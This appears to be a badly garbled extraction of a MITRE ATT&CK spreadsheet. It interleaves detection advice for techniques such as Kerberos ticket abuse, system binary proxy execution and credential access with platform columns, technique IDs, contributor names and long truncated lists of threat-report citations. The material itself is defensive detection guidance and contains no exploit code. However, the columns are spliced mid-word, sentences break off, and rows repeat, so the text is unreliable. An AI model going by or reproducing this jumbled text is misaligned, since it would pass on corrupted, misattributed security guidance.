command-line 1 T1053 of the 'systemd-run'
arguments SarathKuma root,
utility as itUser TRUEto create timers.(Citation: arch
may be used
Monitor proLinux, Win Network Tra FALSE
MonitoringLinux, Win Command: C FALSE
PRE may be focused on FALSE
Detection efforts related stages of the adversaryBarbara Louis-Sidney
lifecycle, (OWN-CERT)
such as during Initial Access.
PRE may be focused on related
Detection efforts 1 T1597
stages of the adversary lifecycle, such as during Initial Access.
PRE may be focused on related
Detection efforts 1 T1597
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on FALSE related stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1596
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1596
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1596
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1596
Detection efforts
PRE may be focused on related stages of the adversary lifecycle, such as during Initial Access.
1 T1596
Detection efforts
PRE may be focused on FALSE related stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related stages of the adversary
1 T1593 Mattlifecycle,
Burrough,such as during InitialMicrosoft;
@mattburrough, Access. Vinayak Wadhwa
Detection efforts
PRE may be focused on related 1 T1593
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE may be focused on related 1 T1593
stages of the adversary lifecycle, such as during Initial Access.
Monitor forPRE Application FALSE James P Callahan, Professional Paranoid
Process monitoring
Linux, NetmayApplication
be used to detect
FALSE servers components that perform suspicious actions such as running cmd.exe or ac
Monitor execution
Windowsand Command:
command-lineCo arguments
1 T1505 of <code>AppCmd.exe</code>,
Wes Hurd Administrator,
which maySYSTEM
be abused to install malicious IIS
On a MSSQL Linux, Win Application 1 T1505 Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pe
Monitor module
Windows loadsCommand:
by the Terminal
C Services
1 T1505process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the
Consider mo Linux, Win Application 1 T1505 ChristofferAdministrator, root, SYSTEM
Linux, Net
Log authentication Application
attempts to the server1andT1505
any unusual trafficArnim Rupp,
patterns Deutsche
to or from theLufthansa
server andAGinternal network. (Citatio
IaaS, Offic Application FALSE Alex Soler, AttackIQ; FALSE
Remote accessLinux,tools
Winwith
Command:
built-inCfeatures
FALSEmay interact directly with the Windows API to perform these functions outside of ty
CorrelationLinux,
of otherWinevents
Module: Mo
with FALSEsurrounding module loads
behavior Stefan Kanthak
using API monitoring and FALSE
suspicious DLLs written to disk w
Linux, Netdeployment
Perform application Application at regular
FALSE times so that irregularJoe Gumke, U.S.
deployment Bank;stands
activity TRUE
out. Monitor process activity tha
IaaS, Linuand
Monitor processes Command:
command-line C FALSEarguments for actions that could be taken to gather system and network information. R
IaaS, Linu Command:
In cloud environments, additionallyC monitor 1 T1518
logs for the usage ofIsif Ibrahima,
APIs that mayMandiant
be used to gather information about security s
Much of this PRE Internet
activity will S
take place FALSE the visibility of the target organization, making detection of this behavior difficult.
outside
Much of this PREactivity will take place
Internet S outside the visibility of the target organization, making detection of this behavior difficult.
1 T1608
Detection efforts
PRE mayInternetbe focused S on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/0
1 T1608
Much of this PREactivity will take place
Internet S outside the visibility of the target
1 T1608 Diyarorganization,
Saadi Ali; Henmaking detection
Porcilan; Menachemof this behaviorNikola
Goldstein; difficult.
Ko
Resource DevelopmenPRE Internet S 1 T1608 Hiroki Nagahama, NEC Corporation; Manikantan Srinivasan, N
Much of this PREactivity will take place
Internet S outside the visibility of the target
1 T1608 Kobi organization, making detection
Haimovich, CardinalOps; of thisGoldstein
Menachem behavior difficult.
Much of this PREactivity will take place
Internet S outside the visibility of the target organization, making detection of this behavior difficult.
1 T1608
Administrators can setActive
Containers, up a variety
Dire ofFALSE
logs and leverage audit tools to monitor
Arun Seelagan,actions that Burns,
CISA; Jack can beHubSpot;
conducted asSakowicz,
Jeff a result ofMicr
OA
Monitor forLinux, Off File: File FALSE Johann Rehberger; Menachem Goldstein; Microsoft Threat In
Credential Access Identity P Active Dire FALSE Lee Christensen, SpecterOps; Thirumalai Natarajan, Mandian
Monitor forLinux,
unusualWinprocesses
Active Diraccessing FALSE<code>secrets.ldb</code> CodyandThomas,
<code>.secrets.mkey</code>
SpecterOps; Tim Kerberos located
authentication
in <code>/var/lenab
Enable AudiWindows Active Dire 1 T1558 Dan Nutting, @KerberToast; Jac Valid domain account
Credential Monitor
Access forLinux, macFile: File A 1 T1558
indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally.
Windows Active Dire 1 T1558 Itamar MizUser
Enable AudiWindows Active Dire 1 T1558 Praetorian Valid domain account or the
Monitor forWindows
unexpected Logon Sess interacting
processes 1 T1558
with lsass.exe.(Citation: Medium UserDetecting Attempts to Steal Passwords from M
Monitor and Linux, Win Command:
investigate attemptsCto FALSE
modify extendedAnti-virus, Application
file attributes Control,
with utilities suchAutoruns Analysis, DigitalBuilt-in
as <code>xattr</code>. Certificate Val
system
Collect andWindows, File: File 1 T1553 Windows User Account Control
Monitor pro Windows, Command: C 1 T1553 ApplicationAbel Morales, Exabeam
macOS is aCommand:
*QuarantineEvents Co containing
SQLite database
BE36A4562FB2EE05DBB3D32323ADF445084ED656 1 T1553 a listAnti-virus,
of all filesBrandon
assignedDalton @PartyD0lphin; Swasti Bhushan Deb,
the <code>com.apple.quarantine</code> IBM Ind
attribute
Linux, Win Command: C
* CDD4EEAE6000AC7F40C3802C171E30148030C072 1 T1553 Digital CertItzik Kotler, SafeBreach; Matt Graeber, @mattifestation, Spec
Monitor com Windows File: File C 1 T1553 Anti-virus, Christiaan Beek, @ChristiaanBeek
Analyze Autoruns
Windows dataFile:
for File
oddities and anomalies,
1 T1553 specifically
Applicationmalicious files attempting
Matt Graeber, persistent
@mattifestation, execution by hiding within
SpecterOps
Use verific Linux, Win File: File FALSE Veeral Patel
Perform phy Linux, Win Sensor Heal 1 T1195
Use verific Linux, Win File: File 1 T1195
Use verific Linux, Win File: File 1 T1195
Monitor for file
* To detectLinux, activity
loading Win (creations,
Command:
and downloads,
executionC of FALSE modifications,
local/remote etc.),
Anti-virus,
payloads especially
Hans
- Event for
Christoffer
1 (Process file types
Gaardløs;
creation) that are Maharjan,
Nishan
where not typical
ParentImage within an
@loki248;
contains enviro
Praet
CMSTP.e
* To detectWindows
[Bypass User AccountCControl](https://attack.mitre.org/techniques/T1548/002)
Command: 1 T1218 Anti-virus, Nik Seetharaman, Palantir; via an auto-elevated
Ye Yint Min Thu Htut,COM interfac
Offensive Se
Monitor presence
Windows andCommand:
use of CHM C files, especially
1 T1218 if they are notRahmat
Application typicallyNurfauzi,
used within an environment.
@infosecn1nja, PT Xynexis International
Analyze new Windows
Control Panel
Command: items Cas well as1 T1218
those presentApplication
on diskESET
for malicious
Administrator,
content. BothSYSTEM,
executable
User and CPL formats are
Defense Evasion Linux, Win Command: C 1 T1218 Debabrata Sharma
Use processWindows Command: C 1 T1218 ApplicationCasey Smith User
Monitor forWindows
creation and
Command:
use of .msc
C files.1MMCT1218may legitimately
ApplicationWes be used
Hurdto call Microsoft-created .msc files, such as <code>s
AdversariesWindows
may rename Command:
abusable C binaries1 T1218
to evade detections, but the argument <code>INJECTRUNNING</code> is required
Monitor use Windows
of HTA files.
Command:
If they are
C not typically
1 T1218used Application
within an environment
@ionstorm;User then execution of them may be suspicious
Use processWindows Command: C 1 T1218 ApplicationAlexandros Pappas; Ziv Kaspersky, Cymptom
Use procesWindows Command: C 1 T1218 Application control, DiUser
Use procesWindows Command: C 1 T1218 ApplicationCasey SmitAdministrator, User
Use processWindows Command: C 1 T1218 Anti-virus, Casey Smith
Command Windows
argumentsCommand:
used with theC rundll32.exe
1 T1218 invocation
Anti-virus,
mayCasey
also beSmith;
usefulGareth Phillips, Seek
in determining Ltd.; James_inthe_box,
the origin and purpose of the MeD
Use processWindows Command: C 1 T1218 ApplicationRodrigo Garcia, Red Canary
IaaS,systems,
In cloud-based Linu Command: C FALSE
native logging Austin
can be used to identify access to Clark,
certain@c2defense; Maril Vernon
APIs and dashboards that @shewhohacks; Prae
may contain system
IaaS,flows
Monitor traffic Linu to
Command: C FALSE
geo-location service provider sites, such asHiroki Nagahama,
ip-api and ipinfo.NEC Corporation; Katie Nickels, Red Canary
Linux, Win
Monitor processes Command:
and C
command-line 1 T1614 for actions thatHarshal
arguments could be TuUser
taken to gather system language information. This
Linux, Net
Monitor processes Command:
and C FALSE
command-line arguments for actions thatAustin
could Clark,
be taken@c2defense
to gather system and network information. R
Monitor processes
Linux, Win and command-line
Command: C arguments
1 T1016 for actions that could be taken User to check Internet connectivity.
This type oLinux, Win Command: C 1 T1016 Alex Spivakovsky, Pentera; Christopher Peacock; Liran Ravich
Monitor processes
IaaS, Linuand command-line
Command: arguments for actions thatAustin
C FALSE could Clark,
be taken to gather system
@c2defense; and network information. R
Praetorian
For network infrastructure
Linux, Net Activedevices,
Dire collect
FALSE AAA logging to monitor `show`
Austin commands
Clark, @c2defensebeing run by non-standard users from no
Monitor scrWindows Command: C FALSE ApplicationPraetorian; Wes Hurd
Monitor scrWindows Command: C 1 T1216 ApplicationAtul Nair, Qualys
Defense Evasion Windows Command: C 1 T1216 Shaul Vilkomir-Preisman
Monitor processes
Linux, Win and command-line
Command: arguments for actions thatHarshal
C FALSE could be taken to gather
Tupsamudre, system information related to servi
Qualys
Monitor forLinux, Win Command: C FALSE TRUE
When removing
macOS[Launch Command:
Agent](https://attack.mitre.org/techniques/T1543/001)s
Co 1 T1569 or [LaunchFALSE
Daemon](https://attack.mitre.or
Changes toWindows Command: C 1 T1569 TRUE
Use procesLinux, Net Command: C FALSE Austin Clark, @c2defense; Hubert Mank
For network Linux,
infrastructure
Net Command: devices,
C collect
FALSE AAA logging to monitor Austin
`show`Clark,
commands
@c2defense;
being FIRST.ORG's
run by non-standard
Cyber Threat
usersIntellige
from no
FrequentlyLinux,
scan shared
Off File:
network
File directories
FALSE for malicious files, hidden
Davidfiles,
Routin;
.LNKMichal
files, and
Dida,other
ESETfile
Access
typestothat
shared
mayfolders
not typical
and
Monitor .rtfWindows Network
files for strings Tra FALSE
indicating Static File Brian Wiltcontrol
the <code>*\template</code> User word has been modified to retrieve a URL re
Linux, Net
The Wake-on-LAN Network
magic packetTra FALSE
consists of 6 bytes of Defensive Josh Day,
<code>FF</code> Gigamon;
followed Tony Lee
by sixteen repetitions of the target system's
Record netw Linux, Net Network Tra 1 T1205 User
Identify ru Linux, Win Network Tr 1 T1205 CrowdStrike; Tim (Wadhwa-)Brown
IaaS, Offic
In AWS, sharing Application
an Elastic Block StoreFALSE
(EBS) snapshot, either withDarin Smith,
specified Cisco;
users ExtraHop;
or publicly, Gabriel Currie;
generates Praetorian
a ModifySnapshotAttri
Use processWindows
monitoring Command:
to monitorC the
FALSE
execution and Application
argumentsCasey
of fromSmith; Matthew
developer Demaske,
utilities Adaptforward
that may be abused. Compare rec
Defense Evasion Windows Command: C 1 T1127 Wirapong Petshagun .NET Framework
Use processWindows Command: C 1 T1127 @ionstorm; Carrie Roberts, @O .NET Framework version 4 or
Establish mIaaS, IdentApplication FALSE ExtraHop; Jannie Li, Microsoft Threat Intelligence Center (MS
Additionally, monitor Aprocesses
Containers, pplicatio for applications
FALSE that can be usedAustin
to query the@c2defense
Clark, Registry, such as [Reg](https://attack.mitre.org/
MonitoringLinux, macCommand: C 1 T1552
Credential Access Office Suit Application 1 T1552 Douglas Weir
It may be possible
IaaS to detect adversary
User Accou use of credentials
1 T1552 they have obtained such as in [Valid Accounts](https://attack.mitre.o
Praetorian
It may be possible to detect adversary
ContainersCommand: C use1of credentials they have
T1552 obtained
Center such as in [ValidDefense
for Threat-Informed Accounts](https://attack.mitre.o
(CTID); Jay Chen, Palo Al
While detecContainersCommand: C 1 T1552 Jay Chen, Palo Alto Networks; MAccess to files
Monitor pro Windows Command: C 1 T1552 Sudhanshu Chauhan, @SudhansAbility to query some Registr
Deploy a newWindows
XML fileCommand:
with permissions
C set
1 T1552
to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Find
Monitor acc Linux, Net Command: C 1 T1552 Austin Clark, @c2defense; Itzik Kotler, SafeBreach
Monitor sysIaaS Instance: I FALSE Netskope
Configure rContainers,Active Dire FALSE System AccBlake Strom, Microsoft Threat Intelligence; Pawel Partyka, Mi
Monitor acc Containers,Web Creden 1 T1550 System AccBlake Strom, Microsoft Threat Intelligence; Dylan Silva, AWS S
Event ID 4768
Windows
and 4769 Active
will Dire
also be generated
1 T1550on the System
DomainAccController
Blake Strom,
whenMicrosoft
a user requests
365 Defender;
a new ticket
Travisgranting
Smith, Tripwire
ticket or s
Event ID 4769
Windows
is generated
ActiveonDire
the Domain1 Controller
T1550 when
Systemusing
AccRyan
a golden
Becwar;
ticket
Vincent
after the
Le Toux
KRBTGTKerberos
password
authentication
has been resetenab
tw
Monitor forIaaS, Offic Applicatio 1 T1550 System AccJack Burns, HubSpot; Johann Rehberger
ContainersApplication
Anti-virus can FALSEdocuments and files that
potentially detect malicious Ale are
Houspanossian;
downloaded Fand executed
FALSE on the user's computer. En
Linux,
Anti-virus can Win File:detect
potentially File malicious1documents
T1204 TruKno
and files that FALSE on the user's computer. En
are downloaded and executed
Monitor the Containers,Application 1 T1204 Center for User
Linux,
Anti-virus can Win File:detect
potentially File malicious1documents
T1204 and files that are downloaded from aFALSE link and executed on the user's co
Containers,
Perform regular auditsLogon Sess andFALSE
of domain Anti-virus,
local system accounts Jon Sterns
to detect Administrator,
accounts Userbeen created by an adversary f
that may have
Monitor the IaaS, IdentLogon Sess 1 T1078 Arun SeelagAdministrator, User
Monitor whe Containers,Logon Sess 1 T1078 Administrator, User
Perform regular
Linux,audits of domain
Win Logon Sess accounts to detect accounts that
1 T1078 Jonmay have been createdUser
SternstAdministrator, by an adversary for persistence.
Perform reg ContainersLogon Sess 1 T1078 Administrator, User
Behavior that could
Linux, Winindicate
Command:technique use include an unknown or
C FALSE unusual process accessing APIs associated with devices or s
PraetorianUser
Virtualizat Linux, Win Command: C FALSE Anti-virus, Deloitte Threat Library Team; Sunny Neo
Virtualizat Linux, Win Command: C 1 T1497 Anti-virus, Deloitte Threat Library Team; Kostya Vasilkov
Time-basedLinux, Win Command: C 1 T1497 Anti-virus, Deloitte Threat Library Team; Jeff Felling, Red Canary; Jorge O
User activi Linux, Win Command: C 1 T1497 Anti-virus, Deloitte Threat Library Team
There is noNetwork File: File M FALSE Encryption Administrator
There is noNetwork File: File M 1 T1600 Administrator
There is noNetwork File: File M 1 T1600 Administrator
Host data tLinux, Win Network Tra FALSE Anastasios Pingios; Sarathkumar Rajendran, Microsoft Defend
Host data tLinux, Win Network Tra 1 T1102 User
Host data tLinux, Win Network Tra 1 T1102 User
Host data tLinux, Win Network Tra 1 T1102 User
Monitor neWindows Command: C FALSE @ionstorm; Olaf Harto TRUE
The presenceWindows Module:
of msxsl.exe Mo utilities
or other FALSE that enableAnti-virus, Avneet that
proxy execution Singh;
areCasey Smith;
typically usedPraeMicrosoft Core XML
for development, Servicesa
debugging,
impacteffective
type permissions
relationship citations
(Citation: TrendMicro RaspberryRobin 2022),(Citation: Github UACMe)
Administra(Citation: McAfee Honeybee),(Citation: BitDefender BADHATCH Mar 2021),(Citation: Trend Micro DRBCo
root (Citation: Carbon Black Shlayer Feb 2019),
(Citation: OSX Keydnap malware),(Citation: ANSSI Sandworm January 2021),
root (Citation: hexed osx.dok analysis 2019),(Citation: objsee mac malware 2017),(Citation: Cobalt Strike Man
i; Marina Liang; Wojciech Reguła ,(Citation: TCC macOS bypass)
,
SYSTEM (Citation: Mandiant APT41),(Citation: GitHub PowerSploit May 2012),(Citation: GitHub Sliver C2),(Citation
(Citation: GitHub PoshC2),(Citation: Secureworks REvil September 2019),(Citation: Malwarebytes Konni A
SYSTEM (Citation: Sygnia Elephant Beetle Jan 2022),(Citation: SentinelLabs Metador Technical Appendix Sept 202
(Citation: Malwarebytes Konni Aug 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: C
(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: Github PowerShell Empire),(Citation: Adsecurity M
(Citation: BitDefender BADHATCH Mar 2021),(Citation: McAfee Sodinokibi October 2019),(Citation: Syma
Availability (Citation: Unit42 LockerGoga 2019),(Citation: Secureworks GOLD SAHARA),(Citation: MSTIC DEV-0537 M
oft Threat Intelligence Center (MS(Citation: Mandiant FIN13 Aug 2022),(Citation: Volexity SolarWinds),(Citation: FOX-IT May 2016 Mofang)
(Citation: GitHub Pacu),(Citation: MSTIC Nobelium Oct 2021),(Citation: AADInternals Documentation),(Ci
miriamxyra, Microsoft Security (Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021),(Citation: SOCRadar INC Ransom
(Citation: Symantec Dragonfly),(Citation: Trend Micro TA505 June 2019),(Citation: CISA Iran Albanian Att
Wiesner, @miriamxyra, Microsof(Citation: NCC Group Chimera January 2021),(Citation: GitHub PowerSploit May 2012),(Citation: Mandian
nie Li, Microsoft Threat Intelli (Citation: Volexity Exchange Marauder March 2021),(Citation: Novetta Blockbuster),(Citation: Symantec
, Fidelis Security; Arun Seelagan, (Citation: GitHub Pacu),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Crowdstrike TELCO
Soler, AttackIQ; Arad Inbar, Fide (Citation: CrowdStrike StellarParticle January 2022),(Citation: Crowdstrike TELCO BPO Campaign Decemb
,
nie Li, Microsoft Threat Intel (Citation: Microsoft Albanian Government Attacks September 2022),(Citation: MSTIC Nobelium Oct 2021
ty Researcher - Hack The Box, UK)(Citation: Microsoft Net Group),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: FireEye SM
n Seelagan, CISA; Joe Gumke, U (Citation: NCSC et al APT29 2024),(Citation: Volexity SolarWinds),(Citation: AADInternals Documentation
tin Clark, @c2defense; Dror Alo (Citation: Trend Micro Skidmap),(Citation: TrendMicro EarthLusca 2022),(Citation: Aqua TeamTNT Augus
,
Tiwary (Indian Army) (Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Mandiant_UNC2165),(Citation: Mandia
,
(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Novetta-Axiom),
Menachem Goldstein; Nikola Kova (Citation: McAfee Honeybee),(Citation: FireEye APT28),(Citation: Secureworks COBALT DICKENS August 2
tion; Juan Carlos Campuzano - Mn(Citation: Microsoft Ransomware as a Service),(Citation: HP RaspberryRobin 2024),
(Citation: ESET Lazarus Jun 2020),(Citation: McAfee Honeybee),(Citation: McAfee Night Dragon),(Citation
(Citation: Google Cloud APT41 2024),
(Citation: PWC Yellow Liderc 2023),(Citation: Microsoft HAFNIUM March 2020),(Citation: Lumen KVBotne
(Citation: Trend Micro Muddy Water March 2021),(Citation: Volexity Ocean Lotus November 2020),(Citati
(Citation: FireEye TEMP.Veles 2018),
(Citation: CISA GRU29155 2024),(Citation: Trend Micro TeamTNT),
(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: Cybersecurity Advisory SVR T
Richard Julian, Citi (Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Rostovcev APT41 2021),
skiy, Atomic Threat Coverage pro (Citation: CISA AA20-301A Kimsuky),(Citation: Huntress NPPSPY 2022),(Citation: objsee mac malware 201
(Citation: Cylance Cleaver),(Citation: Bitdefender LuminousMoth July 2021),(Citation: Cisco ARP Poisonin
rew Allen, @whitehat_zero ,(Citation: dhcp_serv_op_events),(Citation: ntlm_relaying_kerberos_del)
(Citation: US District Court Indictment GRU Oct 2018),
; Eric Kuehn, Secure Ideas; Matt (Citation: GitHub PoshC2),(Citation: GitHub Inveigh),(Citation: Impacket Tools),(Citation: Kaspersky Threa
(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: Sy
(Citation: MoustachedBouncer ESET August 2023),(Citation: FireEye APT32 May 2017),(Citation: NCC Gro
(Citation: MoustachedBouncer ESET August 2023),(Citation: McAfee Honeybee),(Citation: BitDefender BA
(Citation: MoustachedBouncer ESET August 2023),(Citation: FireEye APT28),(Citation: Talos NavRAT May
Sofia Sanchez Margolles (Citation: Mandiant APT1 Appendix),
(Citation: TrendMicro Gamaredon April 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Ka
(Citation: MoustachedBouncer ESET August 2023),(Citation: FireEye APT32 May 2017),(Citation: ESET Gra
(Citation: ESET ForSSHe December 2018),(Citation: Trustwave Pillowmint June 2020),(Citation: ESET Mac
(Citation: Palo Alto Reaver Nov 2017),(Citation: Mandiant APT41),(Citation: ESET Machete July 2019),(Cit
(Citation: Mandiant No Easy Breach),(Citation: MSTIC FoggyWeb September 2021),(Citation: ESET Turla L
ayan Mohan (Citation: Symantec Sowbug Nov 2017),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Trend Micro
(Citation: MoustachedBouncer ESET August 2023),(Citation: FireEye APT37 Feb 2018),(Citation: Cylance S
Permissions to access directories(Citation: NCC Group Chimera January 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019
(Citation: ATT Sidewinder January 2021),(Citation: ESET Machete July 2019),(Citation: Bitdefender Strong
,
ench, Elastic; Red Canary; Ricardo(Citation: FBI FLASH APT39 September 2020),(Citation: Unit 42 BackConfig May 2020),(Citation: FireEye P
(Citation: Cylance Dust Storm),(Citation: Securelist Dtrack),(Citation: Checkpoint IndigoZebra July 2021),
(Citation: Microsoft PoisonIvy 2017),(Citation: FireEye Regsvr32 Targeting Mongolian Gov),(Citation: palo
(Citation: Crysys Skywiper),(Citation: Graeber 2014),(Citation: Microsoft Configure LSA)
(Citation: NSA/FBI Drovorub August 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citati
(Citation: Microsoft SIR Vol 21),(Citation: Microsoft Wingbird Nov 2017),(Citation: Symantec Pasam May
(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: hexed osx.dok analysis 2019),(Citatio
SYSTEM ,
(Citation: ESET PipeMon May 2020),(Citation: ESET Gelsemium June 2021),(Citation: TrendMicro EarthLu
,(Citation: Re-Open windows on Mac)
(Citation: Talos NavRAT May 2018),(Citation: Unit 42 Bisonal July 2018),(Citation: Picus Emotet Dec 2018
(Citation: Deply Mimikatz),(Citation: Github PowerShell Empire),(Citation: GitHub PowerSploit May 2012
(Citation: Palo Alto Reaver Nov 2017),(Citation: Cofense Astaroth Sept 2018),(Citation: NCC Group Team9
,(Citation: Microsoft W32Time May 2017)
(Citation: ESET Turla Mosquito Jan 2018),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: PWC KeyB
(Citation: Fysbis Dr Web Analysis),(Citation: RotaJakiro 2021 netlab360 analysis),(Citation: Red Canary NE
(Citation: RotaJakiro 2021 netlab360 analysis),(Citation: apt41_mandiant),(Citation: Mandiant APT29 Eye
,
(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Talos Seduploader Oct 2017),(Citation: ESET Zebro
,
(Citation: NCSC Cyclops Blink February 2022),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citati
(Citation: Kaspersky Adwind Feb 2016),
ner, ICEBRG; Manikantan Srinivas(Citation: IBM Grandoreiro April 2020),(Citation: Malwarebytes Crossrider Apr 2018),(Citation: Zdnet Kim
rporation India; Mike Kemmerer; (YCitation: NCC Group Chimera January 2021),(Citation: ESET Machete July 2019),(Citation: CISA AA20-239
(Citation: Bitdefender Agent Tesla April 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Juniper Ic
David Fiser, @anu4is, Trend Mi (Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: CIS
(Citation: ESET Trickbot Oct 2020),(Citation: Bitdefender Trickbot March 2020),(Citation: NCC Group Chim
(Citation: McAfee Night Dragon),(Citation: FireEye FIN6 April 2016),(Citation: Kali Hydra),(Citation: US-CE
enter (MSTIC); Mohamed Kmal (Citation: Symantec Emotet Jul 2018),(Citation: FireEye Periscope March 2018),(Citation: CIS Emotet Dec
ntelligence Center (MSTIC) (Citation: NCSC et al APT29 2024),(Citation: NCC Group Chimera January 2021),(Citation: GitHub MailSnip
am Nautilus Aqua Security; Michae ,(Citation: Kubernetes Hardening Guide),(Citation: Docker Daemon Socket Protect)
(Citation: Trend Micro DRBControl February 2020),(Citation: Bitdefender Agent Tesla April 2020),(Citatio
(Citation: AADInternals Root Access to Azure VMs),(Citation: MSTIC Nobelium Oct 2021),(Citation: GitHub
rian; Regina Elwell (Citation: GitHub Pacu),(Citation: MSTIC Octo Tempest Operations October 2023),
(Citation: CISA Scattered Spider Advisory November 2023),
n; Suzy Schapperle - Microsoft A (Citation: GitHub Pacu),(Citation: Roadtools),(Citation: AADInternals Documentation),
(Citation: GitHub Pacu),(Citation: Peirates GitHub),
(Citation: Donut Github),(Citation: Nccgroup Gh0st April 2018),(Citation: ESET ForSSHe December 2018),
(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: Kandji Cuckoo April 2024),(Citatio
(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot F
(Citation: GitHub Pacu),(Citation: Talos TeamTNT),(Citation: MSTIC Nobelium Toolset May 2021),
(Citation: MoustachedBouncer ESET August 2023),(Citation: Donut Github),(Citation: Symantec WastedL
(Citation: Cyphort EvilBunny),(Citation: Talos PoetRAT October 2020),(Citation: Kaspersky Lua),
,(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Cisco IOS Software Integrity Assurance
(Citation: FireEye APT32 May 2017),(Citation: CISA Iran Albanian Attacks September 2022),(Citation: Fire
Python is installed. (Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Donut Github),(Citation: ESET Machete July 2019),
(Citation: Unit 42 Hildegard Malware),(Citation: Fidelis Turbo),(Citation: objective-see windtail1 dec 2018
(Citation: Unit 42 Bisonal July 2018),(Citation: Picus Emotet Dec 2018),(Citation: ESET Grandoreiro April 2
(Citation: FireEye APT32 May 2017),(Citation: Symantec Sowbug Nov 2017),(Citation: PWC KeyBoys Feb 2
(Citation: FireEye APT28),(Citation: Microsoft SIR Vol 19),(Citation: ESET Sednit USBStealer 2014),(Citatio
,
(Citation: Google Cloud APT41 2024),(Citation: Mandiant APT29 Microsoft 365 2022),
amless Intelligence (Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: VirusBulletin Kimsuky October 2
(Citation: CISA AA21-200A APT40 July 2021),(Citation: Slowik Sandworm 2021),
; Jamie Williams (U ω U), PANW Uni (Citation: ESET Ebury May 2024),(Citation: ESET Industroyer),(Citation: Mandiant Pulse Secure Zero-Day A
Goldstein; Shailesh Tiwary (Indian ,
(Citation: NCSC Cyclops Blink February 2022),(Citation: CISA AA24-038A PRC Critical Infrastructure Febru
(Citation: NCC Group LAPSUS Apr 2022),
(Citation: Google Iran Threats October 2021),(Citation: Mandiant APT1),(Citation: Secureworks Gold Prel
(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: Mandiant Cutting Edge January
(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Lazarus Jun 2020),(Citation: NSA Sandworm 2020),(
,
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: NSA NCSC Turla OilRig),
(Citation: SentinelOne Gootloader June 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: PWC Yel
(Citation: Unit 42 Hildegard Malware),(Citation: Peirates GitHub),(Citation: Aqua Kinsing April 2020),(Cita
ense (CTID); Vishwas Manral, M (Citation: Cisco Talos Intelligence Group),(Citation: Unit 42 Hildegard Malware),(Citation: Peirates GitHub
(Citation: MoustachedBouncer ESET August 2023),
osoft Threat Intelligence Center ( (Citation: Dragos Crashoverride 2018),(Citation: CISA Scattered Spider Advisory November 2023),(Citatio
Threat Intelligence Center (MSTIC(Citation: MSTIC DEV-0537 Mar 2022),(Citation: MSTIC Nobelium Oct 2021),(Citation: AADInternals Docu
(Citation: Volexity Exchange Marauder March 2021),(Citation: NCC Group Fivehands June 2021),(Citation
(Citation: Trustwave GoldenSpy June 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Sygnia Eleph
(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: PWC Yellow Liderc 2023),(Citation: ESE
,
(Citation: Securelist Calisto July 2018),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation
Administrat(Citation: TrendMicro macOS Dacls May 2020),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Cita
(Citation: ESET TeleBots Oct 2018),(Citation: Unit 42 Hildegard Malware),(Citation: RotaJakiro 2021 netla
ew Demaske, AdaptforAdministra(Citation: Emissary Trojan Feb 2016),(Citation: Dell Sakula),(Citation: Symantec Naid June 2012),(Citation
(Citation: ESET PLEAD Malware July 2018),(Citation: FireEye APT28),(Citation: Symantec Elfin Mar 2019),(
(Citation: GitHub Pacu),
HuntLabs, @redhuntlabs; Ryan Ben (Citation: ESET Grandoreiro April 2020),(Citation: Zdnet Kimsuky Dec 2018),(Citation: MSTIC DEV-0537 M
(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: ESET DazzleSpy Jan 2022),(Citation: Kandj
